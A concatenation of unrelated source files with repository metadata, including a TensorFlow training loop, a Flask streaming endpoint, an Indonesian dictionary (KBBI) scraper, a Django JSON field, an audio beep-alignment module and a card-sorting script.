variables_to_reinit = get_model_variables_within_scopes(reinit_scopes)
print_list("Initialize pruned variables", variables_to_reinit)
assign_ops = []
for v in variables_to_reinit:
key = re.sub(net_name_scope_pruned, net_name_scope_checkpoint, v.op.name)
if key in variables_init_value:
value = variables_init_value.get(key)
# print(key, value)
assign_ops.append(tf.assign(v, tf.convert_to_tensor(value), validate_shape=True))
# v.set_shape(value.shape)
else:
raise ValueError("Key not in variables_init_value, key=", key)
assign_op = tf.group(*assign_ops)
sess.run(assign_op)
#################################################
# Restore unchanged model variable. #
#################################################
variables_to_restore = {re.sub(net_name_scope_pruned, net_name_scope_checkpoint, v.op.name):
v for v in get_model_variables_within_scopes()
if v not in variables_to_reinit}
print_list("restore model variables", variables_to_restore.values())
load_checkpoint(sess, FLAGS.checkpoint_path, var_list=variables_to_restore)
else:
###########################################
## Restore all variables from checkpoint ##
###########################################
variables_to_restore = get_global_variables_within_scopes()
load_checkpoint(sess, train_dir, var_list = variables_to_restore)
#################################################
            # init uninitialized global variables.        #
#################################################
variables_to_init = get_global_variables_within_scopes(sess.run( tf.report_uninitialized_variables() ))
print_list("init unitialized variables", variables_to_init)
sess.run( tf.variables_initializer(variables_to_init) )
init_global_step_value = sess.run(global_step)
print('initial global step: ', init_global_step_value)
if init_global_step_value >= FLAGS.max_number_of_steps:
print('Exit: init_global_step_value (%d) >= FLAG.max_number_of_steps (%d)' \
%(init_global_step_value, FLAGS.max_number_of_steps))
return
###########################
# Record CPU usage #
###########################
# mpstat_output_filename = os.path.join(train_dir, "cpu-usage.log")
# os.system("mpstat -P ALL 1 > " + mpstat_output_filename + " 2>&1 &")
###########################
# Kicks off the training. #
###########################
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
saver = tf.train.Saver(max_to_keep=FLAGS.max_to_keep)
print('HG: # of threads=', len(threads))
duration = 0
duration_cnt = 0
train_time = 0
train_only_cnt = 0
print("start to train at:", datetime.now())
for i in range(init_global_step_value, FLAGS.max_number_of_steps+1):
# run optional meta data, or summary, while run train tensor
#if i < FLAGS.max_number_of_steps:
if i > init_global_step_value:
# train while run metadata
if i % FLAGS.runmeta_every_n_steps == FLAGS.runmeta_every_n_steps-1:
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
loss_value = sess.run(train_tensor,
options = run_options,
run_metadata=run_metadata)
train_writer.add_run_metadata(run_metadata, 'step%d-train' % i)
# Create the Timeline object, and write it to a json file
fetched_timeline = timeline.Timeline(run_metadata.step_stats)
chrome_trace = fetched_timeline.generate_chrome_trace_format()
with open(os.path.join(train_dir, 'timeline_'+str(i)+'.json'), 'w') as f:
f.write(chrome_trace)
# train while record summary
elif i % FLAGS.summary_every_n_steps==0:
train_summary, loss_value = sess.run([summary_op, train_tensor])
train_writer.add_summary(train_summary, i)
# train only
else:
start_time = time.time()
loss_value = sess.run(train_tensor)
train_only_cnt+=1
train_time += time.time() - start_time
duration_cnt +=1
duration += time.time()- start_time
# log loss information
if i%FLAGS.log_every_n_steps==0 and duration_cnt >0:
log_frequency = duration_cnt
examples_per_sec = log_frequency * FLAGS.batch_size / duration
sec_per_batch = float(duration /log_frequency)
summary = tf.Summary()
summary.value.add(tag='examples_per_sec', simple_value=examples_per_sec)
summary.value.add(tag='sec_per_batch', simple_value=sec_per_batch)
train_writer.add_summary(summary, i)
format_str = ('%s: step %d, loss = %.3f (%.1f examples/sec; %.3f sec/batch)')
print(format_str % (datetime.now(), i, loss_value, examples_per_sec, sec_per_batch))
duration = 0
duration_cnt = 0
info= format_str % (datetime.now(), i, loss_value, examples_per_sec, sec_per_batch)
write_detailed_info(info)
else:
# run only total loss when i=0
train_summary, loss_value = sess.run([summary_op, total_loss]) #loss_value = sess.run(total_loss)
train_writer.add_summary(train_summary, i)
format_str = ('%s: step %d, loss = %.3f')
print(format_str % (datetime.now(), i, loss_value))
info= format_str % (datetime.now(), i, loss_value)
write_detailed_info(info)
# record the evaluation accuracy
is_last_step = (i==FLAGS.max_number_of_steps)
if i%FLAGS.evaluate_every_n_steps==0 or is_last_step:
#run_meta = (i==FLAGS.evaluate_every_n_steps)
test_accuracy, run_metadata = evaluate_accuracy(sess, coord, test_dataset.num_samples,
test_images, test_labels, test_images, test_labels,
correct_prediction, FLAGS.test_batch_size, run_meta=False)
summary = tf.Summary()
summary.value.add(tag='accuracy', simple_value=test_accuracy)
train_writer.add_summary(summary, i)
#if run_meta:
# eval_writer.add_run_metadata(run_metadata, 'step%d-eval' % i)
info=('%s: step %d, test_accuracy = %.6f') % (datetime.now(), i, test_accuracy)
print(info)
write_detailed_info(info)
###########################
# Save model parameters . #
###########################
#saver = tf.train.Saver(var_list=get_model_variables_within_scopes([net_name_scope_pruned+'/']))
save_path = saver.save(sess, os.path.join(train_dir, 'model.ckpt-'+str(i)))
print("HG: Model saved in file: %s" % save_path)
coord.request_stop()
coord.join(threads)
total_time = time.time()-tic
train_speed = train_time*1.0/train_only_cnt
train_time = train_speed*(FLAGS.max_number_of_steps) # - init_global_step_value) #/train_only_cnt
info = "HG: training speed(sec/batch): %.6f\n" %(train_speed)
info += "HG: training time(min): %.1f, total time(min): %.1f" %( train_time/60.0, total_time/60.0)
print(info)
write_detailed_info(info)
if __name__ == '__main__':
tf.app.run()
|
[
"hguan2@jupiter.csc.ncsu.edu"
] |
hguan2@jupiter.csc.ncsu.edu
|
1bc13a4894ec6720d5b52ee578c45b2db8736649
|
25dc4d1f8bbe23ee5e0aac38f88e8f71978382d7
|
/Practica_Final/venv/Scripts/easy_install-3.8-script.py
|
2c227d39392de5be2c4544f4c8566736d9074675
|
[] |
no_license
|
jokermanjrj/Python
|
d316169fc4eb05be4b9d8bd3c207da80cad72af3
|
0a37c125bf4590d268ff8848698e95f42c428ebf
|
refs/heads/master
| 2020-09-14T17:43:14.367366
| 2019-12-17T17:03:02
| 2019-12-17T17:03:02
| 223,203,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
#!D:\Users\margueru\PycharmProjects\Practica_Final\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
|
[
"jokermanjrj@gmail.com"
] |
jokermanjrj@gmail.com
|
0e98392bc4f340dbdc2e33a27361f618aa425e0f
|
3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed
|
/Algorithms/LeetCode/L0222CountCompleteBT.py
|
bfc11d0a9aa5748cc23320ebfb9032176850b2a9
|
[] |
no_license
|
arunachalamev/PythonProgramming
|
c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c
|
ea188aaa1b72511aeb769a2829055d0aae55e73e
|
refs/heads/master
| 2021-06-04T03:50:37.976293
| 2020-11-12T19:52:28
| 2020-11-12T19:52:28
| 97,364,002
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 954
|
py
|
class Node:
def __init__(self, val, left=None, right=None):
self.val = val
self.left = left
self.right = right
tree = Node(4, Node(2, Node(1), Node(3)), Node(5, Node(6)))
def countNodes(root):
def exist(idx,d,root):
left,right = 0, 2**d - 1
node = root
for _ in range(d):
pivot = left + (right - left)//2
if idx <= pivot:
node = node.left
right = pivot
else:
                node = node.right
left = pivot
return node is not None
if not root:
return 0
d = 0
node = root
while node.left:
node = node.left
d = d + 1
left, right = 1, 2**d -1
while (left <= right):
pivot = left + (right -left )//2
if exist(pivot,d,root):
left = pivot + 1
else:
right = pivot -1
return 2**d -1 + left
print (countNodes(tree))
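# Note on the approach: countNodes first walks the leftmost path to get the depth d,
# then binary-searches the 2**d slots of the last level with exist(); each probe walks
# one root-to-leaf path, so the total cost is O(d**2) = O(log^2 n) instead of O(n).
# For the sample tree above (6 nodes) the call prints 6.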
|
[
"arunachalamev@gmail.com"
] |
arunachalamev@gmail.com
|
959b341dec10e56fae4670c07e539f2bfb6d728b
|
9d904e52e49df52739c3287454469d5831b01ab0
|
/week4/minitorrent/minitorrent/server.py
|
b99059ca3950fde488ff4b15c69c3be71ca24e52
|
[] |
no_license
|
joeyabouharb/term2-challenges
|
dab54da02e9182d5633ec275667e07792934445b
|
6b10296dcb187024df75d7620b01a1d848313c95
|
refs/heads/master
| 2023-01-25T05:10:09.106671
| 2019-10-22T23:56:53
| 2019-10-22T23:56:53
| 203,889,286
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
"""
handles server/ web functionality for
torrent client.
"""
from flask import Flask, Response
import time
import getpass
app = Flask(__name__)
@app.route('/hello')
def greet():
def data_generator():
text = f"Hello, from {getpass.getuser()}"
for letter in text:
time.sleep(0.5)
yield letter
return Response(data_generator(), mimetype="text/plain")
if __name__ == '__main__':
app.run(host='0.0.0.0', port=1234)
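# A minimal client sketch for the streaming /hello route above (an addition, not part
# of the original file; assumes the server is running locally on port 1234 as configured
# and that the `requests` package is installed):
#
#   import requests
#   with requests.get("http://localhost:1234/hello", stream=True) as resp:
#       for chunk in resp.iter_content(chunk_size=1):
#           print(chunk.decode(), end="", flush=True)   # letters arrive ~0.5 s apart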
|
[
"joey.abouharb@gmail.com"
] |
joey.abouharb@gmail.com
|
9aad7fa7d1a503f9eba210098993a05a32d1ed91
|
8afb5afd38548c631f6f9536846039ef6cb297b9
|
/MY_REPOS/INTERVIEW-PREP-COMPLETE/notes-n-resources/Data-Structures-N-Algo/_DS-n-Algos/Interview-Problems/HackerRank/Python/Introduction/Python-Division.py
|
4f8ebf6254287c1545a4e91b15393a9155977ae3
|
[
"MIT"
] |
permissive
|
bgoonz/UsefulResourceRepo2.0
|
d87588ffd668bb498f7787b896cc7b20d83ce0ad
|
2cb4b45dd14a230aa0e800042e893f8dfb23beda
|
refs/heads/master
| 2023-03-17T01:22:05.254751
| 2022-08-11T03:18:22
| 2022-08-11T03:18:22
| 382,628,698
| 10
| 12
|
MIT
| 2022-10-10T14:13:54
| 2021-07-03T13:58:52
| null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
if __name__ == "__main__":
a = int(input())
b = int(input())
print(a // b)
print(a / b)
|
[
"bryan.guner@gmail.com"
] |
bryan.guner@gmail.com
|
1bcbd7efb3783683cf04688d856ed4cb0483668e
|
d4e2d0efb752f7aebeb48c2754d229ac4f6f089b
|
/kbbi/kbbi.py
|
7171529284bf1f4a1a97d63b9460cddbb424a99a
|
[
"MIT"
] |
permissive
|
noaione/kbbi-python
|
ce61d4f00d7a4925b69cf7129d8f9637ae486a62
|
063b4fe603c7187e88258bd1007e8c7ad51f50db
|
refs/heads/master
| 2020-11-25T14:30:41.653374
| 2020-03-17T15:07:46
| 2020-03-17T15:07:46
| 228,717,022
| 0
| 0
|
MIT
| 2019-12-17T23:07:59
| 2019-12-17T23:07:59
| null |
UTF-8
|
Python
| false
| false
| 11,510
|
py
|
"""
:mod:`kbbi` -- Modul KBBI Python
================================
.. module:: kbbi
:platform: Unix, Windows, Mac
:synopsis: Modul ini mengandung implementasi dari modul kbbi.
.. moduleauthor:: sage <laymonage@gmail.com>
"""
import argparse
import json
import sys
from urllib.parse import quote
import requests
from bs4 import BeautifulSoup
class KBBI:
"""Sebuah laman dalam KBBI daring."""
host = "https://kbbi.kemdikbud.go.id"
def __init__(self, kueri):
"""Membuat objek KBBI baru berdasarkan kueri yang diberikan.
:param kueri: Kata kunci pencarian
:type kueri: str
"""
self.nama = kueri
self._init_pranala()
laman = requests.get(self.pranala)
self._cek_galat(laman)
self._init_entri(laman)
def _init_pranala(self):
kasus_khusus = [
"." in self.nama,
"?" in self.nama,
self.nama.lower() == "nul",
self.nama.lower() == "bin",
]
if any(kasus_khusus):
self.pranala = f"{self.host}/Cari/Hasil?frasa={quote(self.nama)}"
else:
self.pranala = f"{self.host}/entri/{quote(self.nama)}"
def _cek_galat(self, laman):
if "Beranda/Error" in laman.url:
raise TerjadiKesalahan()
if "Beranda/BatasSehari" in laman.url:
raise BatasSehari()
if "Entri tidak ditemukan." in laman.text:
raise TidakDitemukan(self.nama)
def _init_entri(self, laman):
sup = BeautifulSoup(laman.text, "html.parser")
estr = ""
self.entri = []
for label in sup.find("hr").next_siblings:
if label.name == "hr":
if label.get("style") is None:
self.entri.append(Entri(estr))
break
else:
continue
if label.name == "h2":
if label.get("style") == "color:gray":
continue
if estr:
self.entri.append(Entri(estr))
estr = ""
estr += str(label).strip()
def serialisasi(self):
"""Mengembalikan hasil serialisasi objek KBBI ini.
:returns: Dictionary hasil serialisasi
:rtype: dict
"""
return {
"pranala": self.pranala,
"entri": [entri.serialisasi() for entri in self.entri],
}
def __str__(self, contoh=True):
return "\n\n".join(
entri.__str__(contoh=contoh) for entri in self.entri
)
def __repr__(self):
return f"<KBBI: {self.nama}>"
class Entri:
"""Sebuah entri dalam sebuah laman KBBI daring."""
def __init__(self, entri_html):
entri = BeautifulSoup(entri_html, "html.parser")
judul = entri.find("h2")
self._init_nama(judul)
self._init_nomor(judul)
self._init_kata_dasar(judul)
self._init_pelafalan(judul)
self._init_varian(judul)
self._init_makna(entri)
def _init_nama(self, judul):
self.nama = ambil_teks_dalam_label(judul, ambil_italic=True)
if not self.nama:
self.nama = judul.find_all(text=True)[0].strip()
def _init_nomor(self, judul):
nomor = judul.find("sup", recursive=False)
self.nomor = nomor.text.strip() if nomor else ""
def _init_kata_dasar(self, judul):
dasar = judul.find_all(class_="rootword")
self.kata_dasar = []
for tiap in dasar:
kata = tiap.find("a")
dasar_no = kata.find("sup")
kata = ambil_teks_dalam_label(kata)
self.kata_dasar.append(
f"{kata} ({dasar_no.text.strip()})" if dasar_no else kata
)
def _init_pelafalan(self, judul):
lafal = judul.find(class_="syllable")
self.pelafalan = lafal.text.strip() if lafal else ""
def _init_varian(self, judul):
varian = judul.find("small")
self.bentuk_tidak_baku = []
self.varian = []
if varian:
bentuk_tidak_baku = varian.find_all("b")
if bentuk_tidak_baku:
self.bentuk_tidak_baku = "".join(
e.text.strip() for e in bentuk_tidak_baku
).split(", ")
else:
self.varian = (
varian.text[len("varian: ") :].strip().split(", ")
)
def _init_makna(self, entri):
if entri.find(color="darkgreen"):
makna = [entri]
else:
makna = entri.find_all("li")
self.makna = [Makna(m) for m in makna]
def serialisasi(self):
return {
"nama": self.nama,
"nomor": self.nomor,
"kata_dasar": self.kata_dasar,
"pelafalan": self.pelafalan,
"bentuk_tidak_baku": self.bentuk_tidak_baku,
"varian": self.varian,
"makna": [makna.serialisasi() for makna in self.makna],
}
def _makna(self, contoh=True):
if len(self.makna) > 1:
return "\n".join(
f"{i}. {makna.__str__(contoh=contoh)}"
for i, makna in enumerate(self.makna, 1)
)
if len(self.makna) == 1:
return self.makna[0].__str__(contoh=contoh)
return ""
def _nama(self):
hasil = self.nama
if self.nomor:
hasil += f" ({self.nomor})"
if self.kata_dasar:
hasil = f"{' » '.join(self.kata_dasar)} » {hasil}"
return hasil
def _varian(self, varian):
if varian == self.bentuk_tidak_baku:
nama = "bentuk tidak baku"
elif varian == self.varian:
nama = "varian"
else:
return ""
return f"{nama}: {', '.join(varian)}"
def __str__(self, contoh=True):
hasil = self._nama()
if self.pelafalan:
hasil += f" {self.pelafalan}"
for var in (self.bentuk_tidak_baku, self.varian):
if var:
hasil += f"\n{self._varian(var)}"
return f"{hasil}\n{self._makna(contoh)}"
def __repr__(self):
return f"<Entri: {self._nama()}>"
class Makna:
"""Sebuah makna dalam sebuah entri KBBI daring."""
def __init__(self, makna_label):
self._init_submakna(makna_label)
self._init_kelas(makna_label)
self._init_contoh(makna_label)
self.submakna = self.submakna.split("; ")
def _init_submakna(self, makna_label):
baku = makna_label.find("a")
if baku:
self.submakna = f"→ {ambil_teks_dalam_label(baku)}"
nomor = baku.find("sup")
if nomor:
self.submakna += f" ({nomor.text.strip()})"
else:
self.submakna = (
"".join(
i.string for i in makna_label.contents if i.name != "font"
)
.strip()
.rstrip(":")
)
def _init_kelas(self, makna_label):
kelas = makna_label.find(color="red")
lain = makna_label.find(color="darkgreen")
info = makna_label.find(color="green")
if kelas:
kelas = kelas.find_all("span")
if lain:
kelas = [lain]
self.submakna = lain.next_sibling.strip()
self.submakna += (
f" {makna_label.find(color='grey').get_text().strip()}"
)
self.kelas = []
for k in kelas:
kode = k.text.strip()
pisah = k["title"].strip().split(": ")
nama = pisah[0].strip()
deskripsi = pisah[1].strip() if len(pisah) > 1 else ""
self.kelas.append(
{"kode": kode, "nama": nama, "deskripsi": deskripsi}
)
self.info = ""
if info:
info = info.text.strip()
if not any(info == k["kode"] for k in self.kelas):
self.info = info
def _init_contoh(self, makna_label):
indeks = makna_label.text.find(": ")
if indeks != -1:
contoh = makna_label.text[indeks + 2 :].strip()
self.contoh = contoh.split("; ")
else:
self.contoh = []
def serialisasi(self):
return {
"kelas": self.kelas,
"submakna": self.submakna,
"info": self.info,
"contoh": self.contoh,
}
def _kelas(self):
return " ".join(f"({k['kode']})" for k in self.kelas)
def _submakna(self):
return "; ".join(self.submakna)
def _contoh(self):
return "; ".join(self.contoh)
def __str__(self, contoh=True):
hasil = f"{self._kelas()} " if self.kelas else ""
hasil += self._submakna()
hasil += f" {self.info}" if self.info else ""
hasil += f": {self._contoh()}" if contoh and self.contoh else ""
return hasil
def __repr__(self):
return f"<Makna: {'; '.join(self.submakna)}>"
def ambil_teks_dalam_label(sup, ambil_italic=False):
"""Mengambil semua teks dalam sup label HTML (tanpa anak-anaknya).
:param sup: BeautifulSoup/Tag dari suatu label HTML
:type sup: BeautifulSoup/Tag
:returns: String semua teks dalam sup label HTML
:rtype: str
"""
if ambil_italic:
italic = sup.find("i")
if italic:
sup = italic
return "".join(i.strip() for i in sup.find_all(text=True, recursive=False))
class TidakDitemukan(Exception):
"""
Galat yang menunjukkan bahwa laman tidak ditemukan dalam KBBI.
"""
def __init__(self, kueri):
super().__init__(f"{kueri} tidak ditemukan dalam KBBI!")
class TerjadiKesalahan(Exception):
"""
Galat yang menunjukkan bahwa terjadi kesalahan dari pihak KBBI.
Laman: https://kbbi.kemdikbud.go.id/Beranda/Error
"""
def __init__(self):
super().__init__("Terjadi kesalahan saat memproses permintaan Anda.")
class BatasSehari(Exception):
"""
Galat yang menunjukkan bahwa pencarian telah mencapai
batas maksimum dalam sehari.
Laman: https://kbbi.kemdikbud.go.id/Beranda/BatasSehari
"""
def __init__(self):
super().__init__(
"Pencarian Anda telah mencapai batas maksimum dalam sehari."
)
def _parse_args(args):
parser = argparse.ArgumentParser()
parser.add_argument(
"laman", help='Laman yang ingin diambil, contoh: "cinta"'
)
parser.add_argument(
"-t",
"--tanpa-contoh",
help="jangan tampilkan contoh (bila ada)",
action="store_true",
)
parser.add_argument(
"-j",
"--json",
help="tampilkan hasil (selalu dengan contoh) dalam bentuk JSON",
action="store_true",
)
parser.add_argument(
"-i",
"--indentasi",
help="gunakan indentasi sebanyak N untuk serialisasi JSON",
type=int,
metavar="N",
)
return parser.parse_args(args)
def _keluaran(laman, args):
if args.json:
return json.dumps(laman.serialisasi(), indent=args.indentasi)
else:
return laman.__str__(contoh=not args.tanpa_contoh)
def main(argv=None):
"""Program utama dengan CLI."""
if argv is None:
argv = sys.argv[1:]
args = _parse_args(argv)
try:
laman = KBBI(args.laman)
except (TidakDitemukan, TerjadiKesalahan, BatasSehari) as e:
print(e)
else:
print(_keluaran(laman, args))
if __name__ == "__main__":
main()
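# Example usage of the KBBI class above (a sketch; it needs network access to
# kbbi.kemdikbud.go.id and a query word that exists, e.g. "cinta"):
#
#   laman = KBBI("cinta")
#   print(laman)                 # formatted entries, meanings and examples
#   data = laman.serialisasi()   # dict with "pranala" and "entri" keys
#
# Equivalent CLI call: python kbbi.py cinta --json --indentasi 2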
|
[
"laymonage@gmail.com"
] |
laymonage@gmail.com
|
ab0c97be8356d23ee69f80c1faab35862a64cd41
|
7798c5171e4f63b40e9a2d9ae16f4e0f60855885
|
/movies/fields.py
|
f47d03541e5243ebc5e832afe7b5c78251b75f87
|
[] |
no_license
|
mstepniowski/wffplanner
|
d2d5ddd2938bd2b7b294332dad0d24fa63c2700a
|
62d1d00ca9a546b759e5c394c7a9da06484a7aa3
|
refs/heads/master
| 2020-05-20T06:04:22.413395
| 2015-10-01T16:12:48
| 2015-10-01T16:12:48
| 6,033,243
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,478
|
py
|
import base64
import zlib
import json
from django import forms
from django.forms import widgets
from django.db import models
from django.core import exceptions
from django.core.serializers.json import DjangoJSONEncoder
class JSONTextareaWidget(widgets.Textarea):
def render(self, name, value, attrs=None):
if isinstance(value, basestring):
# value seems to be already encoded
return super(JSONTextareaWidget, self).render(name, value, attrs)
try:
value = json.dumps(value, cls=DjangoJSONEncoder, sort_keys=True)
return super(JSONTextareaWidget, self).render(name, value, attrs)
except TypeError, e:
raise ValueError(e)
class JSONFormField(forms.CharField):
widget = JSONTextareaWidget
def __init__(self, *args, **kwargs):
self.json_type = kwargs.pop('json_type', None)
super(JSONFormField, self).__init__(*args, **kwargs)
def clean(self, value):
value = super(JSONFormField, self).clean(value)
try:
json_value = json.loads(value)
if self.json_type is not None and not isinstance(json_value, self.json_type):
raise forms.ValidationError('JSON object is not of type %s' % self.json_type)
return value
except ValueError, e:
raise forms.ValidationError('Enter a valid JSON value. Error: %s' % e)
class JSONField(models.TextField):
"""JSONField is a generic textfield that neatly serializes/unserializes
JSON objects seamlessly"""
# Used so to_python() is called
__metaclass__ = models.SubfieldBase
# Minimum length of value before compression kicks in
compression_threshold = 64
def __init__(self, verbose_name=None, json_type=None, compress=False, *args, **kwargs):
self.json_type = json_type
self.compress = compress
super(JSONField, self).__init__(verbose_name, *args, **kwargs)
# An accesor used only in South introspection,
# which stupidly calls any callable it receives
# and then runs repr on it!
def get_json_type(self):
class Repr:
"""A class that always returns the __repr__ it's told to."""
def __init__(self, repr):
self.repr = repr
def __repr__(self):
return self.repr
if self.json_type is None:
return None
else:
return Repr(self.json_type.__name__)
def to_python(self, value):
"""Convert our string value to JSON after we load it from the DB"""
if isinstance(value, basestring):
if self.compress and value.startswith('zlib;;'):
value = zlib.decompress(base64.decodestring(value[6:]))
try:
value = json.loads(value)
except ValueError:
pass
if self.json_type and not isinstance(value, self.json_type):
raise exceptions.ValidationError(
"%r is not of type %s (error occured when trying to access "
"'%s.%s' field)" %
(value, self.json_type, self.model._meta.db_table, self.name))
return value
def get_db_prep_save(self, value, connection):
"""Convert our JSON object to a string before we save"""
if self.json_type and not isinstance(value, self.json_type):
raise TypeError("%r is not of type %s" % (value, self.json_type))
try:
value = json.dumps(value)
except TypeError, e:
raise ValueError(e)
if self.compress and len(value) >= self.compression_threshold:
value = 'zlib;;' + base64.encodestring(zlib.compress(value))
return super(JSONField, self).get_db_prep_save(value, connection=connection)
def value_to_string(self, obj):
value = self._get_val_from_obj(obj)
return self.get_db_prep_value(value)
def formfield(self, **kwargs):
defaults = {'form_class': JSONFormField, 'json_type': self.json_type}
defaults.update(kwargs)
return super(JSONField, self).formfield(**defaults)
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([(
[JSONField],
[],
{
'json_type': ['get_json_type', {'default': None}],
'compress': ['compress', {'default': False}],
},
)], ["^movies\.fields\.JSONField"])
|
[
"marek@stepniowski.com"
] |
marek@stepniowski.com
|
b45258c2fbb47a193d71099a6ed42c0ced1e3667
|
a12c1498ab5f87c57453fa8a5cf421f7598f1a19
|
/alignment.py
|
8981b2eca80c73f3f0629346231e90bf48ec58f2
|
[] |
no_license
|
VascoXu/SmashAudio
|
b8c379f166f4bbe23b6e935636ba3888dc51ace2
|
7a16b195a3ce668516f8c559b019fbccc3495e9d
|
refs/heads/master
| 2023-03-03T02:22:04.141856
| 2021-02-07T00:19:42
| 2021-02-07T00:19:42
| 277,709,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,078
|
py
|
# https://github.com/allisonnicoledeal/VideoSync/blob/master/alignment_by_row_channels.py
import scipy.io.wavfile
import numpy as np
import scipy as sc
from scipy import signal
import matplotlib.pyplot as plt
import scipy.io.wavfile as wavfile
from scipy.signal import find_peaks
from pydub import AudioSegment
from itertools import groupby
import math
def normalize_audio(sound, target_dBFS):
"""Normalize audio"""
change_in_dBFS = target_dBFS - sound.dBFS
return sound.apply_gain(change_in_dBFS)
def detect_leading_silence(sound, silence_threshold=-30.0, chunk_size=5):
"""Find leading silence"""
trim_ms = 0
assert chunk_size > 0
while sound[trim_ms:trim_ms+chunk_size].dBFS < silence_threshold and trim_ms < len(sound):
trim_ms += chunk_size
return trim_ms
def find_beep(audio):
"""Find Beep by Mayank Goel"""
fs_audio,y_audio = wavfile.read(audio)
try:
y_audio = y_audio[:,0]
except:
pass
y_trimmed = y_audio[:(int)(y_audio.shape[0])]
FFT_SIZE = 256
NOVERLAP = (3*FFT_SIZE/4)
f,t,pxx = signal.spectrogram(y_trimmed, nperseg=FFT_SIZE, fs=fs_audio, noverlap=NOVERLAP)
trackBeep = np.argmax(pxx,0)
sounds = [list(b) for a, b, in groupby(enumerate(trackBeep), lambda x: x[1])]
beep = max(sounds, key = lambda sub: len(list(sub)))
first_oc = beep[0][0]
last_oc = beep[len(beep) - 1][0]
length = t[last_oc] - t[first_oc]
return (t[first_oc], length)
def sync_audio(audio1, audio2):
"""Sync Audio by finding beep sound"""
sync_point1 = find_beep(audio1)
sync_point2 = find_beep(audio2)
return {'sync_point1': sync_point1, 'sync_point2': sync_point2}
def normalize_align(audio1, audio2):
"""Align audio through normalize"""
sound1 = AudioSegment.from_wav("temp1.wav")
sound2 = AudioSegment.from_file("temp2.m4a")
normalized_sound = normalize_audio(sound2, sound1.dBFS)
sync1 = (detect_leading_silence(sound1) / 1000)
sync2 = (detect_leading_silence(normalized_sound) / 1000)
return (sync1, sync2)
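# Example usage (a sketch; "camera.wav" and "phone.wav" are hypothetical recordings
# of the same event that both contain the synchronization beep):
#
#   points = sync_audio("camera.wav", "phone.wav")
#   start1, _ = points['sync_point1']
#   start2, _ = points['sync_point2']
#   print("offset between recordings: %.3f s" % (start1 - start2))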
|
[
"vax1@pitt.edu"
] |
vax1@pitt.edu
|
981cbab9c5bd1127874bf4e954e37da9d09bb6a7
|
3d8b77daceb1fc2ca4b3683cd9ad806a21069742
|
/ssstest.py
|
96dd1680af3d80f235c975ab393a7afc515e2a6a
|
[] |
no_license
|
1647790440/test
|
7226f248f20fb0437e0a61e3f936f9b8b67dc760
|
876ed1f9d8c59624d8471b760fa0d2d3be0b3d74
|
refs/heads/master
| 2020-08-15T04:44:51.063578
| 2019-10-15T11:36:35
| 2019-10-15T11:36:35
| 215,281,795
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,640
|
py
|
#Shisanshui ("thirteen cards" Chinese poker) hand-arranging algorithm
#First version
import collections
# def get_str():
# card_string = ""
# return card_string
#Convert the input string into a list of cards
def stl(card_string):
card_list = []
card_list = card_string.split(' ')
return card_list
#print(stl("*2 *4 *3 *5 *6 $A *7 *8 *9 *10 *J *Q *K *A")) 单元测试
def cut_card(card_list,select_best):
t_list = card_list
t_list = sorted(set(card_list) - set(select_best),key=t_list.index) #保证顺序
return t_list
#print(cut_card(['*2', '*3', '*4', '*5', '*6', '*7', '*8', '*9', '*10', '*J', '*Q', '*K', '*A'],['*2', '*4', '*5', '*6', '*7', '*8', '*10', '*Q', '*K', '*A']))
#Sort the cards by rank
def seq(card_list):
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
card_dict_ordered = collections.OrderedDict()
#card_list = []
card_list_ordered = []
seq_card_list = []
#card_list = stl(card_string)
#card_list = ['*2', '*4', '*5', '*7','*6', '*8', '*10', '*Q', '*K', '*A','$A'] #测试
#card_list.reverse() #测试
#print(card_list) #测试
#a = '2' #测试
#print(card_dict[a])
for item in card_list:
str = item[1:]
value = card_dict[str]
card_dict_ordered[item] = value
card_dict_ordered=collections.Counter(card_dict_ordered).most_common()
for item in card_dict_ordered:
card_list_ordered.append(item[0])
#print(card_list_ordered) #测试
#print(card_dict_ordered) #测试
#print(type(card_dict_ordered)) #测试
seq_card_list = card_list_ordered
return seq_card_list
#print(seq(['*2', '*4', '*5', '*7','*6', '*8', '*10', '*Q', '*K', '*A','$A']))
#Split the cards by suit
def select_suit(card_list):
spade_list = [] #$
heart_list = [] #&
diamond_list = [] ##
club_list = [] #*
for item in card_list:
if(item[0] == '$'):
spade_list.append(item)
elif(item[0] == '&'):
heart_list.append(item)
elif(item[0] == '#'):
diamond_list.append(item)
else:
club_list.append(item)
return spade_list,heart_list,diamond_list,club_list
#A test example should go here
# spade_list,heart_list,diamond_list,club_list = select_suit(['&2', '*4', '$5', '#6', '*7', '*8', '#10', '*Q', '#K', '*A','$A'])
# print(spade_list)
# print(heart_list)
# print(diamond_list)
# print(club_list)
#Split out bombs (four of a kind), three of a kinds, pairs, and single cards
def select_pair(card_list):
c_list = card_list.copy()
c_list.append("^B") #重点
one = []
two = []
three = []
four = []
t_list = []
for i in range(len(c_list)-1):
t_list.append(c_list[i])
#print(t_list)
#print(c_list[i])
if(c_list[i][1:] != c_list[i+1][1:]):
if(len(t_list) == 1):
one.append(t_list)
elif(len(t_list) == 2):
two.append(t_list)
elif(len(t_list) == 3):
three.append(t_list)
else:
four.append(t_list)
t_list = []
#print(card_list)
#print(c_list)
return one,two,three,four
